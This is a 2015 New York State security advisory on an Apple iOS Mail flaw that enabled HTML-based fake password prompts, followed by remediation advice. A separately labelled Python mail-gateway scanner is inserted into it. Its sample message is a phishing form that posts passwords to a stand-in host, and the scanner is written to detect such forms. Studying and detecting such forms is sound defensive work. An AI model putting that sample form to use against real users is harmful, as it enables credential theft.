Vulnerability Found in Apple iOS can lead to Password Disclosure

ITS Advisory Number: 2015-065
Date(s) Issued: Monday, June 15, 2015
Subject: Vulnerability Found in Apple iOS can lead to Password Disclosure
Overview: 

A vulnerability has been discovered in Apple's iOS mail client which could enable an attacker to load external HTML and easily carry out convincing phishing attacks on unsuspecting users. Several ID accounts are tied to many different applications within iOS, including iCloud, Apple's App Store and the user's iTunes account. Several others are present in third-party applications. Successful exploitation of this vulnerability could result in the attacker harvesting any user account the attacker is after.

Systems Affected: 
  • Apple iOS 8.0 and above
RISK
GOVERNMENT
Large and medium government entities: High
Small government entities: High
BUSINESS
Large and medium business entities: High
Small business entities: High
Home Users: High
Description: 

A vulnerability has been discovered in Apple's iOS mail client that can lead to a user giving up their Apple ID account. The vulnerability exploits a bug in the operating system's native email client to produce a realistic pop-up of the kind Apple users are accustomed to. Anyone with access to it can customize the attack to ask for whichever username and password credentials they want.

This vulnerability would allow remote HTML content to be loaded, replacing the content of the original email message. JavaScript is disabled in this UIWebView, but it is still possible to build a functional password collector using simple HTML and CSS.
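A check a mail gateway could run on inbound messages, given here as an added example that is not part of the advisory: it walks each HTML part and flags the markup a script-free credential prompt relies on (a password field, a form posting to a remote host) together with elements that make a viewer load remote content. The advisory does not name the construct involved, so the list of remote-loading elements is an assumption drawn from general HTML, and the function names and sample message are constructed.

```python
import email
from email import policy
from html.parser import HTMLParser

# Assumption: generic HTML elements that can pull a remote document into a
# rendered message. The advisory does not say which construct is involved.
REMOTE_LOADERS = {"iframe": "src", "frame": "src", "object": "data", "embed": "src"}


def _is_remote(url):
    return url.strip().lower().startswith(("http://", "https://", "//"))


class _MailHtmlAudit(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "input" and a.get("type", "").lower() == "password":
            self.findings.append("password-input")
        elif tag == "form" and _is_remote(a.get("action", "")):
            self.findings.append("remote-form-action")
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append("meta-refresh")
        elif tag in REMOTE_LOADERS and _is_remote(a.get(REMOTE_LOADERS[tag], "")):
            self.findings.append("remote-" + tag)


def audit_message(raw_bytes):
    """Return sorted unique findings across all text/html parts of a message."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    audit = _MailHtmlAudit()
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            audit.feed(part.get_content())
    audit.close()
    return sorted(set(audit.findings))


# Constructed sample: an HTML mail carrying a login-style form.
SAMPLE = (
    b"From: a@example.com\r\nTo: b@example.com\r\nSubject: Account notice\r\n"
    b"MIME-Version: 1.0\r\nContent-Type: text/html; charset=utf-8\r\n\r\n"
    b'<html><body><form action="https://collector.example/submit" method="post">'
    b'<input type="text" name="id"><input type="password" name="pw">'
    b"</form></body></html>\r\n"
)

if __name__ == "__main__":
    print(audit_message(SAMPLE))
```

A non-empty result is a reason to quarantine or strip the HTML part before delivery; legitimate mail rarely needs a password field or a remotely loaded frame.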

As of the publishing of this advisory, this cannot be prevented with New York State's mobile device management platform. If you think an account has been compromised and would like assistance, please call the New York State Cyber Security Operations Center at the number below.

Actions: 

We recommend the following actions be taken:

  • Do not enter credentials into the pop-up box should you receive an email asking for them.
  • If you think you were compromised, immediately use Apple's password reset procedure to change your password.